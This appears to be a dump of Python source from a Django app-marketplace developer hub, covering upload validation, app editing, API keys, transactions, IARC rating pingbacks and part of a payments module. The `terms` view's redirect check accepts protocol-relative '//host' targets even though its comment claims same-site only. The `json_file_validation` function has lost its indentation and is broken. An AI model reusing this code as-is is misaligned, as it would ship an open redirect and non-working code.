        amo.log(amo.LOG.CHANGE_VERSION_STATUS, unicode(version.status[0]),
                version)
        # Call update_version, so various other bits of data update.
        addon.update_version()

        # If the version we are publishing is the current_version one, and the
        # app was in waiting state as well, update the app status.
        if (version == addon.current_version and
            addon.status == amo.STATUS_PUBLIC_WAITING):
            addon.update(status=amo.STATUS_PUBLIC)
            amo.log(amo.LOG.CHANGE_STATUS, addon.get_status_display(), addon)

        # Call to update names and locales if changed.
        addon.update_name_from_package_manifest()
        addon.update_supported_locales()

        messages.success(request, _('Version successfully made public.'))

    return redirect(addon.get_dev_url('versions'))
@dev_required
@post_required
@transaction.commit_on_success
def version_delete(request, addon_id, addon):
    """Delete one version of an app, unless its file is blocked."""
    version_id = request.POST.get('version_id')
    version = get_object_or_404(Version, pk=version_id, addon=addon)
    if version.all_files[0].status == amo.STATUS_BLOCKED:
        # Blocked versions must stay visible to the blocklist machinery.
        raise PermissionDenied
    version.delete()
    messages.success(request,
                     _('Version "{0}" deleted.').format(version.version))
    return redirect(addon.get_dev_url('versions'))
@dev_required(owner_for_post=True, webapp=True)
def ownership(request, addon_id, addon, webapp=False):
    """Manage an app's authors: add/remove users and change their roles."""
    # Authors.
    qs = AddonUser.objects.filter(addon=addon).order_by('position')
    user_form = forms.AuthorFormSet(request.POST or None, queryset=qs)

    if request.method == 'POST' and user_form.is_valid():
        # Authors.
        authors = user_form.save(commit=False)
        redirect_url = addon.get_dev_url('owner')

        for author in authors:
            action = None
            if not author.id or author.user_id != author._original_user_id:
                action = amo.LOG.ADD_USER_WITH_ROLE
                author.addon = addon
            elif author.role != author._original_role:
                action = amo.LOG.CHANGE_USER_WITH_ROLE

            author.save()
            if action:
                amo.log(action, author.user, author.get_role_display(), addon)
            # A changed user on an existing row is both an add (above) and
            # a removal of the original user.
            if (author._original_user_id and
                author.user_id != author._original_user_id):
                amo.log(amo.LOG.REMOVE_USER_WITH_ROLE,
                        (UserProfile, author._original_user_id),
                        author.get_role_display(), addon)

        for author in user_form.deleted_objects:
            if author.user_id == request.user.id:
                # The current user removed their own access to the app.
                redirect_url = reverse('mkt.developers.apps')
            amo.log(amo.LOG.REMOVE_USER_WITH_ROLE, author.user,
                    author.get_role_display(), addon)

        messages.success(request, _('Changes successfully saved.'))
        return redirect(redirect_url)

    ctx = dict(addon=addon, webapp=webapp, user_form=user_form)
    return render(request, 'developers/apps/owner.html', ctx)
@anonymous_csrf
def validate_addon(request):
    """Standalone validator page for both hosted and packaged apps."""
    return render(request, 'developers/validate_addon.html', {
        'upload_hosted_url':
            reverse('mkt.developers.standalone_hosted_upload'),
        'upload_packaged_url':
            reverse('mkt.developers.standalone_packaged_upload'),
    })
@post_required
def _upload(request, addon=None, is_standalone=False):
    """Accept a packaged-app upload, queue validation, then redirect.

    Shared implementation behind the new-app, per-app and standalone
    packaged upload endpoints. The validator task only runs for a valid
    form; the redirect to the upload-detail page happens either way so
    validation errors can be displayed there.
    """
    # If there is no user, default to None (saves the file upload as anon).
    form = NewPackagedAppForm(request.POST, request.FILES,
                              user=getattr(request, 'amo_user', None),
                              addon=addon)
    if form.is_valid():
        tasks.validator.delay(form.file_upload.pk)

    if addon:
        return redirect('mkt.developers.upload_detail_for_addon',
                        addon.app_slug, form.file_upload.pk)
    elif is_standalone:
        return redirect('mkt.developers.standalone_upload_detail',
                        'packaged', form.file_upload.pk)
    else:
        return redirect('mkt.developers.upload_detail',
                        form.file_upload.pk, 'json')
@login_required
def upload_new(*args, **kwargs):
    """Login-required wrapper around `_upload` for brand-new submissions."""
    return _upload(*args, **kwargs)
@anonymous_csrf
def standalone_packaged_upload(request):
    """Standalone-validator entry point for packaged (zip) uploads."""
    return _upload(request, is_standalone=True)
@dev_required
def upload_for_addon(request, addon_id, addon):
    """Upload a new package for an existing app."""
    return _upload(request, addon=addon)
@dev_required
def refresh_manifest(request, addon_id, addon, webapp=False):
    """Synchronously re-fetch a hosted app's manifest; 204 on completion."""
    log.info('Manifest %s refreshed for %s' % (addon.manifest_url, addon))
    _update_manifest(addon_id, True, {})
    return http.HttpResponse(status=204)
@post_required
@json_view
@write
def _upload_manifest(request, is_standalone=False):
    """Queue a fetch/validation of a hosted app manifest URL.

    Redirects to the upload-detail page on success; returns a JSON
    validation stub directly when the manifest is a duplicate or the
    form is invalid.
    """
    form = forms.NewManifestForm(request.POST, is_standalone=is_standalone)
    if (not is_standalone and
        waffle.switch_is_active('webapps-unique-by-domain')):
        # Helpful error if user already submitted the same manifest.
        dup_msg = trap_duplicate(request, request.POST.get('manifest'))
        if dup_msg:
            return {'validation': {'errors': 1, 'success': False,
                    'messages': [{'type': 'error', 'message': dup_msg,
                                  'tier': 1}]}}
    if form.is_valid():
        upload = FileUpload.objects.create()
        tasks.fetch_manifest.delay(form.cleaned_data['manifest'], upload.pk)
        if is_standalone:
            return redirect('mkt.developers.standalone_upload_detail',
                            'hosted', upload.pk)
        else:
            return redirect('mkt.developers.upload_detail', upload.pk, 'json')
    else:
        error_text = _('There was an error with the submission.')
        if 'manifest' in form.errors:
            error_text = ' '.join(form.errors['manifest'])
        error_message = {'type': 'error', 'message': error_text, 'tier': 1}

        v = {'errors': 1, 'success': False, 'messages': [error_message]}
        return make_validation_result(dict(validation=v, error=error_text))
@login_required
def upload_manifest(*args, **kwargs):
    """Wrapper function for `_upload_manifest` so we can keep the
    standalone validator separate from the manifest upload stuff.

    Unlike the standalone endpoint, this one requires a logged-in user.
    """
    return _upload_manifest(*args, **kwargs)
def standalone_hosted_upload(request):
    """Standalone-validator entry point for hosted (manifest) uploads."""
    return _upload_manifest(request, is_standalone=True)
@json_view
@anonymous_csrf_exempt
def standalone_upload_detail(request, type_, uuid):
    """JSON validation status for a standalone upload (hosted or packaged)."""
    upload = get_object_or_404(FileUpload, uuid=uuid)
    url = reverse('mkt.developers.standalone_upload_detail',
                  args=[type_, uuid])
    return upload_validation_context(request, upload, url=url)
@dev_required
@json_view
def upload_detail_for_addon(request, addon_id, addon, uuid):
    """JSON validation status for an upload attached to an existing app."""
    upload = get_object_or_404(FileUpload, uuid=uuid)
    return json_upload_detail(request, upload, addon=addon)
def make_validation_result(data):
    """Safe wrapper around JSON dict containing a validation result.

    Unless tracebacks are explicitly exposed via settings, the error is
    reduced to its final line; all validation message values are escaped.
    """
    if not settings.EXPOSE_VALIDATOR_TRACEBACKS:
        if data['error']:
            # Just expose the message, not the traceback.
            data['error'] = data['error'].strip().split('\n')[-1].strip()
    if data['validation']:
        for msg in data['validation']['messages']:
            # Mutating while iterating is safe here: Py2 .items() is a list.
            for k, v in msg.items():
                msg[k] = escape_all(v)
    return data
@dev_required(allow_editors=True)
def file_validation(request, addon_id, addon, file_id):
    """Render the validation-report page for a single file."""
    # Renamed from `file`, which shadowed the builtin.
    file_obj = get_object_or_404(File, id=file_id)

    v = addon.get_dev_url('json_file_validation', args=[file_obj.id])
    return render(request, 'developers/validation.html',
                  dict(validate_url=v, filename=file_obj.filename,
                       timestamp=file_obj.created, addon=addon))
@json_view
@csrf_exempt
@dev_required(allow_editors=True)
def json_file_validation(request, addon_id, addon, file_id):
file = get_object_or_404(File, id=file_id)
if not file.has_been_validated:
if request.method != 'POST':
return http.HttpResponseNotAllowed(['POST'])
try:
v_result = tasks.file_validator(file.id)
except Exception, exc:
log.error('file_validator(%s): %s' % (file.id, exc))
error = "\n".join(traceback.format_exception(*sys.exc_info()))
return make_validation_result({'validation': '',
'error': error})
else:
v_result = file.validation
validation = json.loads(v_result.validation)
return make_validation_result(dict(validation=validation, error=None))
@json_view
def json_upload_detail(request, upload, addon=None):
    """JSON validation result for an upload, plus any app-parsing errors."""
    result = upload_validation_context(request, upload, addon=addon)
    if result['validation']:
        if result['validation']['errors'] == 0:
            try:
                parse_addon(upload, addon=addon)
            except django_forms.ValidationError, exc:
                m = []
                for msg in exc.messages:
                    # Simulate a validation error so the UI displays it.
                    m.append({'type': 'error', 'message': msg, 'tier': 1})
                v = make_validation_result(dict(error='',
                                                validation=dict(messages=m)))
                return json_view.error(v)
    return result
def upload_validation_context(request, upload, addon=None, url=None):
    """Build the common context dict describing an upload's validation."""
    if not settings.VALIDATE_ADDONS:
        # Validation disabled (e.g. locally/in tests): fake a clean result.
        upload.task_error = ''
        upload.is_webapp = True
        upload.validation = json.dumps({'errors': 0, 'messages': [],
                                        'metadata': {}, 'notices': 0,
                                        'warnings': 0})
        upload.save()

    validation = json.loads(upload.validation) if upload.validation else ''
    if not url:
        if addon:
            url = reverse('mkt.developers.upload_detail_for_addon',
                          args=[addon.app_slug, upload.uuid])
        else:
            url = reverse('mkt.developers.upload_detail',
                          args=[upload.uuid, 'json'])
    report_url = reverse('mkt.developers.upload_detail', args=[upload.uuid])

    return make_validation_result(dict(upload=upload.uuid,
                                       validation=validation,
                                       error=upload.task_error, url=url,
                                       full_report_url=report_url))
def upload_detail(request, uuid, format='html'):
    """Validation report for an upload, as JSON (ajax) or a full page."""
    upload = get_object_or_404(FileUpload, uuid=uuid)

    if format == 'json' or request.is_ajax():
        return json_upload_detail(request, upload)

    validate_url = reverse('mkt.developers.standalone_upload_detail',
                           args=['hosted', upload.uuid])
    return render(request, 'developers/validation.html',
                  dict(validate_url=validate_url, filename=upload.name,
                       timestamp=upload.created))
@dev_required(webapp=True, staff=True)
def addons_section(request, addon_id, addon, section, editable=False,
                   webapp=False):
    """Display or save one section of the app edit page.

    `section` selects the form class ('basic', 'media', 'details',
    'support', 'technical' or 'admin'); `editable` switches between the
    read-only and editable renderings of that section.
    """
    basic = AppFormBasic if webapp else addon_forms.AddonFormBasic
    models = {'basic': basic,
              'media': AppFormMedia,
              'details': AppFormDetails,
              'support': AppFormSupport,
              'technical': AppFormTechnical,
              'admin': forms.AdminSettingsForm}

    is_dev = acl.check_addon_ownership(request, addon, dev=True)

    if section not in models:
        raise http.Http404()

    version = addon.current_version or addon.latest_version

    tags, previews, restricted_tags = [], [], []
    cat_form = appfeatures = appfeatures_form = version_form = None
    formdata = request.POST if request.method == 'POST' else None

    # Permissions checks.
    # Only app owners can edit any of the details of their apps.
    # Users with 'Apps:Configure' can edit the admin settings.
    if (section != 'admin' and not is_dev) or (section == 'admin' and
        not acl.action_allowed(request, 'Apps', 'Configure') and
        not acl.action_allowed(request, 'Apps', 'ViewConfiguration')):
        raise PermissionDenied

    if section == 'basic':
        cat_form = CategoryForm(formdata, product=addon, request=request)

        # Only show/use the release notes form for hosted apps, packaged apps
        # can do that from the version edit page.
        if not addon.is_packaged:
            version_form = AppVersionForm(formdata, instance=version)
    elif section == 'media':
        previews = PreviewFormSet(
            request.POST or None, prefix='files',
            queryset=addon.get_previews())
    elif section == 'technical':
        # Only show/use the features form for hosted apps, packaged apps
        # can do that from the version edit page.
        if not addon.is_packaged:
            appfeatures = version.features
            appfeatures_form = AppFeaturesForm(formdata, instance=appfeatures)
    elif section == 'admin':
        tags = addon.tags.not_blacklisted().values_list('tag_text', flat=True)
        restricted_tags = addon.tags.filter(restricted=True)

    # Get the slug before the form alters it to the form data.
    valid_slug = addon.app_slug
    if editable:
        if request.method == 'POST':
            # Saving the admin section requires the stronger permission.
            if (section == 'admin' and
                not acl.action_allowed(request, 'Apps', 'Configure')):
                raise PermissionDenied

            form = models[section](formdata, request.FILES,
                                   instance=addon, request=request)

            all_forms = [form, previews]
            for additional_form in (appfeatures_form, cat_form, version_form):
                if additional_form:
                    all_forms.append(additional_form)

            if all(not f or f.is_valid() for f in all_forms):
                if cat_form:
                    cat_form.save()

                addon = form.save(addon)

                if appfeatures_form:
                    appfeatures_form.save()

                if version_form:
                    # We are re-using version_form without displaying all its
                    # fields, so we need to override the boolean fields,
                    # otherwise they'd be considered empty and therefore False.
                    version_form.cleaned_data['publish_immediately'] = (
                        version_form.fields['publish_immediately'].initial)
                    version_form.save()

                if 'manifest_url' in form.changed_data:
                    addon.update(
                        app_domain=addon.domain_from_url(addon.manifest_url))
                    update_manifests([addon.pk])

                if previews:
                    for preview in previews.forms:
                        preview.save(addon)

                editable = False
                if section == 'media':
                    amo.log(amo.LOG.CHANGE_ICON, addon)
                else:
                    amo.log(amo.LOG.EDIT_PROPERTIES, addon)

                valid_slug = addon.app_slug
        else:
            form = models[section](instance=addon, request=request)
    else:
        form = False

    data = {'addon': addon,
            'webapp': webapp,
            'version': version,
            'form': form,
            'editable': editable,
            'tags': tags,
            'restricted_tags': restricted_tags,
            'cat_form': cat_form,
            'version_form': version_form,
            'preview_form': previews,
            'valid_slug': valid_slug, }

    if appfeatures_form and appfeatures:
        data.update({
            'appfeatures': appfeatures,
            'feature_list': [unicode(f) for f in appfeatures.to_list()],
            'appfeatures_form': appfeatures_form
        })

    return render(request, 'developers/apps/edit/%s.html' % section, data)
@never_cache
@dev_required(skip_submit_check=True)
@json_view
def image_status(request, addon_id, addon, icon_size=64):
    """Report whether the app's icon and preview images exist on disk.

    Returns JSON with per-asset booleans plus an ``overall`` flag; the
    devhub polls this until async image-resize work has finished.
    """
    # Default icon needs no checking.
    if not addon.icon_type or addon.icon_type.split('/')[0] == 'icon':
        icons = True
    # Persona icon is handled differently.
    elif addon.type == amo.ADDON_PERSONA:
        icons = True
    else:
        # Look for the resized icon file for the requested size.
        icons = os.path.exists(os.path.join(addon.get_icon_dir(),
                                            '%s-%s.png' %
                                            (addon.id, icon_size)))
    previews = all(os.path.exists(p.thumbnail_path)
                   for p in addon.get_previews())
    return {'overall': icons and previews,
            'icons': icons,
            'previews': previews}
@json_view
def ajax_upload_media(request, upload_type):
    """Validate an uploaded image and return its temporary upload hash.

    Responds with JSON: a non-empty ``upload_hash`` on success, otherwise
    an empty hash plus a list of error messages.
    """
    image = request.FILES.get('upload_image')
    if image is None:
        errors = [_('There was an error uploading your preview.')]
        upload_hash = ''
    else:
        image.seek(0)
        errors, upload_hash = check_upload(image, upload_type,
                                           image.content_type)
    if errors:
        # Never hand back a hash alongside validation errors.
        upload_hash = ''
    return {'upload_hash': upload_hash, 'errors': errors}
@dev_required
def upload_media(request, addon_id, addon, upload_type):
    # Thin dev-authenticated wrapper around the generic AJAX upload handler.
    return ajax_upload_media(request, upload_type)
@dev_required
@post_required
def remove_locale(request, addon_id, addon):
    """Delete one of the app's translations (never the default locale)."""
    requested = request.POST.get('locale')
    if not requested or requested == addon.default_locale:
        # Missing locale, or an attempt to drop the default translation.
        return http.HttpResponseBadRequest()
    addon.remove_locale(requested)
    return http.HttpResponse()
def docs(request, doc_name=None, doc_page=None):
    """Render a developer documentation page, or bounce to the landing page.

    Only name/page combinations listed in ``all_docs`` resolve to a
    template; everything else redirects to the ecosystem landing page.
    """
    all_docs = {'policies': ['agreement']}
    filename = ''
    if doc_name and doc_name in all_docs:
        if doc_page and doc_page in all_docs[doc_name]:
            filename = '%s-%s.html' % (doc_name, doc_page)
        else:
            # TODO: Temporary until we have a `policies` docs index.
            filename = None
    if not filename:
        return redirect('ecosystem.landing')
    return render(request, 'developers/docs/%s' % filename)
@login_required
def terms(request):
    """Show and process acceptance of the developer agreement."""
    # Bind the form with read_dev_agreement pre-set so a plain POST marks
    # the agreement as accepted for the current user.
    form = forms.DevAgreementForm({'read_dev_agreement': True},
                                  instance=request.amo_user)
    if request.POST and form.is_valid():
        form.save()
        log.info('Dev agreement agreed for user: %s' % request.amo_user.pk)
        # Only follow same-site redirect targets (path must start with '/').
        if request.GET.get('to') and request.GET['to'].startswith('/'):
            return redirect(request.GET['to'])
        messages.success(request, _('Terms of service accepted.'))
    return render(request, 'developers/terms.html',
                  {'accepted': request.amo_user.read_dev_agreement,
                   'agreement_form': form})
@login_required
def api(request):
    """Manage OAuth API keys for the logged-in developer.

    Admins may not hold API keys.  A POST either deletes an existing key
    or creates a new one; a freshly created key is deleted again if the
    accompanying form data is invalid.
    """
    roles = request.amo_user.groups.filter(name='Admins').exists()
    f = APIConsumerForm()
    if roles:
        messages.error(request,
                       _('Users with the admin role cannot use the API.'))

    elif request.method == 'POST':
        if 'delete' in request.POST:
            try:
                consumer = Access.objects.get(pk=request.POST.get('consumer'))
                consumer.delete()
            except Access.DoesNotExist:
                messages.error(request, _('No such API key.'))
        else:
            # Key is namespaced per user and numbered by the count of
            # keys the user already holds.
            key = 'mkt:%s:%s:%s' % (
                request.amo_user.pk,
                request.amo_user.email,
                Access.objects.filter(user=request.user).count())
            access = Access.objects.create(key=key,
                                           user=request.user,
                                           secret=generate())
            f = APIConsumerForm(request.POST, instance=access)
            if f.is_valid():
                f.save()
                messages.success(request, _('New API key generated.'))
            else:
                # Invalid extra data: roll back the just-created key.
                access.delete()
    consumers = list(Access.objects.filter(user=request.user))
    return render(request, 'developers/api.html',
                  {'consumers': consumers, 'roles': roles, 'form': f})
@addon_view
@post_required
@any_permission_required([('Admin', '%'),
                          ('Apps', 'Configure')])
def blocklist(request, addon):
    """
    Blocklists the app by creating a new version/file.
    """
    if addon.status == amo.STATUS_BLOCKED:
        messages.info(request, _('App already blocklisted.'))
    else:
        addon.create_blocklisted_version()
        messages.success(request, _('Created blocklisted version.'))
    return redirect(addon.get_dev_url('versions'))
@waffle_switch('view-transactions')
@login_required
def transactions(request):
    """List payment transactions for the developer's apps.

    Results are filterable via query params and paginated 50 per page.
    """
    form, transactions = _get_transactions(request)
    return render(request, 'developers/transactions.html',
                  {'form': form, 'CONTRIB_TYPES': amo.CONTRIB_TYPES,
                   'count': transactions.count(),
                   'transactions': amo.utils.paginate(
                       request, transactions, per_page=50)})
def _get_transactions(request):
    """Build the (filter form, transactions queryset) pair for the view."""
    # Limit contributions to apps the requesting developer can list.
    apps = addon_listing(request, webapp=True)[0]
    transactions = Contribution.objects.filter(addon__in=list(apps),
                                               type__in=amo.CONTRIB_TYPES)
    form = TransactionFilterForm(request.GET, apps=apps)
    if form.is_valid():
        transactions = _filter_transactions(transactions, form.cleaned_data)
    return form, transactions
def _filter_transactions(qs, data):
    """Handle search filters and queries for transactions."""
    # Form-field name -> ORM lookup on Contribution.
    filter_mapping = {'app': 'addon_id',
                      'transaction_type': 'type',
                      'transaction_id': 'uuid',
                      'date_from': 'created__gte',
                      'date_to': 'created__lte'}
    for form_field, db_field in filter_mapping.iteritems():
        value = data.get(form_field)
        if not value:
            continue
        try:
            qs = qs.filter(**{db_field: value})
        except ValueError:
            # Skip filters whose value the ORM cannot coerce.
            pass
    return qs
def testing(request):
    # Static page describing how developers can test their apps.
    return render(request, 'developers/testing.html')
@addon_view
def debug(request, addon):
    """Developer-only debug page; only reachable when DEBUG is on."""
    if not settings.DEBUG:
        raise http.Http404

    pay_request = ''
    if addon.is_premium():
        # Build the same JWT webpay would receive for a purchase.
        pay_request = get_product_jwt(
            WebAppProduct(addon),
            user=request.amo_user,
            region=request.REGION,
            source=request.REQUEST.get('src', ''),
            lang=request.LANG
        )['webpayJWT']

    data = {
        'urls': {'es': '%s/apps/webapp/%s' % (settings.ES_URLS[0], addon.pk)},
        'pay_request': pay_request,
    }
    return render(request, 'developers/debug.html',
                  {'app': addon, 'data': data})
class ContentRatingList(CORSMixin, SlugOrIdMixin, ListAPIView):
    """Read-only API listing a single app's content ratings."""
    model = ContentRating
    serializer_class = ContentRatingSerializer
    permission_classes = (AllowAny,)
    cors_allowed_methods = ['get']
    queryset = Webapp.objects.all()
    slug_field = 'app_slug'

    @skip_cache
    def get(self, request, *args, **kwargs):
        app = self.get_object()

        # Narrow the queryset to this app's ratings before delegating.
        self.queryset = app.content_ratings.all()

        if 'since' in request.GET:
            # Optional ?since= filter: only ratings modified after that
            # timestamp; 404 when the filter leaves nothing.
            form = ContentRatingForm(request.GET)
            if form.is_valid():
                self.queryset = self.queryset.filter(
                    modified__gt=form.cleaned_data['since'])
            if not self.queryset.exists():
                raise http.Http404()

        # NOTE(review): `self` is passed where DRF's get() expects
        # `request` — looks wrong but is preserved as-is; verify against
        # the DRF version in use before changing.
        return super(ContentRatingList, self).get(self, request)
class ContentRatingsPingback(CORSMixin, SlugOrIdMixin, CreateAPIView):
    """Endpoint IARC calls to push content-rating results back to an app."""
    cors_allowed_methods = ['post']
    parser_classes = (lib.iarc.utils.IARC_JSON_Parser,)
    permission_classes = (AllowAny,)
    queryset = Webapp.objects.all()
    slug_field = 'app_slug'

    def post(self, request, pk, *args, **kwargs):
        """Validate the pingback token and payload, then store the ratings.

        Returns 415 for non-JSON payloads, 400 on token mismatch or when
        the ratings do not verify against IARC, otherwise 'ok'.
        """
        log.info(u'Received IARC pingback for app:%s' % pk)

        if request.content_type != 'application/json':
            log.info(u'IARC pingback not of content-type "application/json"')
            return Response({
                'detail': "Endpoint only accepts 'application/json'."
            }, status=http_status.HTTP_415_UNSUPPORTED_MEDIA_TYPE)

        app = self.get_object()

        # Verify token.
        data = request.DATA[0]
        if app.iarc_token() != data.get('token'):
            log.info(u'Token mismatch in IARC pingback for app:%s' % app.id)
            return Response({'detail': 'Token mismatch'},
                            status=http_status.HTTP_400_BAD_REQUEST)

        if data.get('ratings'):
            # Double-check with IARC that it's the correct rating.
            if not self.verify_data(data):
                return Response('The ratings do not match the submission ID.',
                                status=http_status.HTTP_400_BAD_REQUEST)

            log.info(u'Setting content ratings from IARC pingback for app:%s' %
                     app.id)

            # We found a rating, so store the id and code for future use.
            if 'submission_id' in data and 'security_code' in data:
                app.set_iarc_info(data['submission_id'], data['security_code'])

            # Update status if incomplete status.
            # Do this before set_content_ratings to not prematurely trigger
            # a refresh.
            log.info('Checking app:%s completeness after IARC pingback.'
                     % app.id)
            if (app.has_incomplete_status() and
                app.is_fully_complete(ignore_ratings=True)):
                log.info('Updating app status from IARC pingback for app:%s' %
                         app.id)
                # Don't call update to prevent recursion in update_status.
                app.update(status=amo.STATUS_PENDING)
                log.info('Updated app status from IARC pingback for app:%s' %
                         app.id)
            elif app.has_incomplete_status():
                log.info('Reasons for app:%s incompleteness after IARC '
                         'pingback: %s' % (app.id, app.completion_errors()))

            app.set_descriptors(data.get('descriptors', []))
            app.set_interactives(data.get('interactives', []))
            # Set content ratings last since it triggers a refresh on Content
            # Ratings page. We want descriptors and interactives visible by
            # the time it's refreshed.
            app.set_content_ratings(data.get('ratings', {}))

        return Response('ok')

    def verify_data(self, data):
        """Cross-check the pingback payload against IARC's Get_App_Info.

        Returns True only when ratings, interactives, and descriptors all
        match what IARC reports for the submission; mismatches are logged.
        """
        client = lib.iarc.client.get_iarc_client('services')
        xml = lib.iarc.utils.render_xml('get_app_info.xml', data)
        resp = client.Get_App_Info(XMLString=xml)
        check_data = lib.iarc.utils.IARC_XML_Parser().parse_string(resp)
        try:
            check_data = check_data.get('rows', [])[0]
        except IndexError:
            return False

        rates_bad = data.get('ratings') != check_data.get('ratings')
        inter_bad = (set(data.get('interactives', [])) !=
                     set(check_data.get('interactives', [])))
        descs_bad = (set(data.get('descriptors', [])) !=
                     set(check_data.get('descriptors', [])))
        if rates_bad:
            log.error('IARC pingback did not match rating %s vs %s' %
                      (data.get('ratings'), check_data.get('ratings')))
        if inter_bad:
            log.error('IARC pingback did not match interactives %s vs %s' %
                      (data.get('interactives'),
                       check_data.get('interactives')))
        if descs_bad:
            log.error('IARC pingback did not match descriptors %s vs %s' %
                      (data.get('descriptors'), check_data.get('descriptors')))
        if rates_bad or inter_bad or descs_bad:
            return False
        return True
########NEW FILE########
__FILENAME__ = views_payments
import functools
import json
import urllib
from django import http
from django.conf import settings
from django.core.urlresolvers import reverse
from django.shortcuts import get_object_or_404, redirect, render
import commonware
import jinja2
import waffle
from curling.lib import HttpClientError
from tower import ugettext as _
from waffle.decorators import waffle_switch
import amo
from access import acl
from amo import messages
from amo.decorators import json_view, login_required, post_required, write
from constants.payments import (PAYMENT_METHOD_ALL, PAYMENT_METHOD_CARD,
PAYMENT_METHOD_OPERATOR, PROVIDER_BANGO,
PROVIDER_CHOICES)
from lib.crypto import generate_key
from lib.pay_server import client
from mkt.constants import DEVICE_LOOKUP, PAID_PLATFORMS
from mkt.developers import forms, forms_payments
from mkt.developers.decorators import dev_required
from mkt.developers.models import CantCancel, PaymentAccount, UserInappKey
from mkt.developers.providers import get_provider, get_providers
from mkt.inapp.models import InAppProduct
from mkt.inapp.serializers import InAppProductForm
from mkt.webapps.models import Webapp
from mkt.prices.models import Price
log = commonware.log.getLogger('z.devhub')
@dev_required
@post_required
def disable_payments(request, addon_id, addon):
    # Turn off voluntary contributions, then return to the payments page.
    addon.update(wants_contributions=False)
    return redirect(addon.get_dev_url('payments'))
@dev_required(owner_for_post=True, webapp=True)
def payments(request, addon_id, addon, webapp=False):
    """Main payments configuration page for an app.

    Validates and saves the premium (price/upsell), region, and
    payment-account forms from one POST, then renders the combined page
    with device/platform constraints and provider/region metadata.
    """
    premium_form = forms_payments.PremiumForm(
        request.POST or None, request=request, addon=addon,
        user=request.amo_user)

    region_form = forms.RegionForm(
        request.POST or None, product=addon, request=request)

    upsell_form = forms_payments.UpsellForm(
        request.POST or None, addon=addon, user=request.amo_user)

    providers = get_providers()

    # Only bind the account formset when management-form data is present.
    if 'form-TOTAL_FORMS' in request.POST:
        formset_data = request.POST
    else:
        formset_data = None
    account_list_formset = forms_payments.AccountListFormSet(
        data=formset_data,
        provider_data=[
            {'addon': addon, 'user': request.amo_user, 'provider': provider}
            for provider in providers])

    if request.method == 'POST':
        active_forms = [premium_form, region_form, upsell_form]
        if formset_data is not None:
            active_forms.append(account_list_formset)

        success = all(form.is_valid() for form in active_forms)

        if success:
            region_form.save()

            try:
                premium_form.save()
            except client.Error as err:
                success = False
                log.error('Error setting payment information (%s)' % err)
                messages.error(
                    request, _(u'We encountered a problem connecting to the '
                               u'payment server.'))
                raise  # We want to see these exceptions!

            is_free_inapp = addon.premium_type == amo.ADDON_FREE_INAPP
            is_now_paid = (addon.premium_type in amo.ADDON_PREMIUMS
                           or is_free_inapp)

            # If we haven't changed to a free app, check the upsell.
            if is_now_paid and success:
                try:
                    if not is_free_inapp:
                        upsell_form.save()
                    if formset_data is not None:
                        account_list_formset.save()
                except client.Error as err:
                    log.error('Error saving payment information (%s)' % err)
                    messages.error(
                        request, _(u'We encountered a problem connecting to '
                                   u'the payment server.'))
                    success = False
                    raise  # We want to see all the solitude errors now.

        # If everything happened successfully, give the user a pat on the back.
        if success:
            messages.success(request, _('Changes successfully saved.'))
            return redirect(addon.get_dev_url('payments'))

    # TODO: refactor this (bug 945267)
    is_packaged = addon.is_packaged
    android_payments_enabled = waffle.flag_is_active(request,
                                                     'android-payments')
    android_packaged_enabled = waffle.flag_is_active(request,
                                                     'android-packaged')
    desktop_packaged_enabled = waffle.flag_is_active(request,
                                                     'desktop-packaged')

    # If android payments is not allowed then firefox os must
    # be 'checked' and android-mobile and android-tablet should not be.
    invalid_paid_platform_state = []

    # If isn't packaged or it is packaged and the android-packaged flag is on
    # then we should check that desktop isn't set to True.
    if not is_packaged or (is_packaged and desktop_packaged_enabled):
        invalid_paid_platform_state.append(('desktop', True))

    if not android_payments_enabled:
        # When android-payments is off...
        # If isn't packaged or it is packaged and the android-packaged flag is
        # on then we should check for the state of android-mobile and
        # android-tablet.
        if not is_packaged or (is_packaged and android_packaged_enabled):
            invalid_paid_platform_state += [('android-mobile', True),
                                            ('android-tablet', True)]
        invalid_paid_platform_state.append(('firefoxos', False))

    cannot_be_paid = (
        addon.premium_type == amo.ADDON_FREE and
        any(premium_form.device_data['free-%s' % x] == y
            for x, y in invalid_paid_platform_state))

    try:
        tier_zero = Price.objects.get(price='0.00', active=True)
        tier_zero_id = tier_zero.pk
    except Price.DoesNotExist:
        tier_zero = None
        tier_zero_id = ''

    # Get the regions based on tier zero. This should be all the
    # regions with payments enabled.
    paid_region_ids_by_name = []
    if tier_zero:
        paid_region_ids_by_name = tier_zero.region_ids_by_name()

    platforms = PAID_PLATFORMS(request, is_packaged)
    paid_platform_names = [unicode(platform[1]) for platform in platforms]

    provider_regions = {}
    if tier_zero:
        provider_regions = tier_zero.provider_regions()

    return render(request, 'developers/payments/premium.html',
                  {'addon': addon, 'webapp': webapp, 'premium': addon.premium,
                   'form': premium_form, 'upsell_form': upsell_form,
                   'tier_zero_id': tier_zero_id, 'region_form': region_form,
                   'DEVICE_LOOKUP': DEVICE_LOOKUP,
                   'is_paid': (addon.premium_type in amo.ADDON_PREMIUMS
                               or addon.premium_type == amo.ADDON_FREE_INAPP),
                   'cannot_be_paid': cannot_be_paid,
                   'paid_platform_names': paid_platform_names,
                   'is_packaged': addon.is_packaged,
                   # Bango values
                   'account_list_forms': account_list_formset.forms,
                   'account_list_formset': account_list_formset,
                   # Waffles
                   'api_pricelist_url': reverse('price-list'),
                   'payment_methods': {
                       PAYMENT_METHOD_ALL: _('All'),
                       PAYMENT_METHOD_CARD: _('Credit card'),
                       PAYMENT_METHOD_OPERATOR: _('Carrier'),
                   },
                   'provider_lookup': dict(PROVIDER_CHOICES),
                   'all_paid_region_ids_by_name': paid_region_ids_by_name,
                   'providers': providers,
                   'provider_regions': provider_regions,
                   })
@login_required
@json_view
def payment_accounts(request):
    """Return JSON rows describing all active payment accounts of the user.

    The optional ?app-slug= parameter adds that app's name to each row
    for display in the account-selection UI.
    """
    app_slug = request.GET.get('app-slug', '')
    if app_slug:
        app = Webapp.objects.get(app_slug=app_slug)
        app_name = app.name
    else:
        app_name = ''
    accounts = PaymentAccount.objects.filter(
        user=request.amo_user,
        provider__in=[p.provider for p in get_providers()],
        inactive=False)

    def account(acc):
        # Serialize one PaymentAccount into the JSON row shape.
        def payment_account_names(app):
            # NOTE: the inner `acc` loop variable shadows the outer one.
            account_names = [unicode(acc.payment_account)
                             for acc in app.all_payment_accounts()]
            return (unicode(app.name), account_names)

        addon_payment_accounts = acc.addonpaymentaccount_set.all()
        associated_apps = [apa.addon
                           for apa in addon_payment_accounts
                           if hasattr(apa, 'addon')]
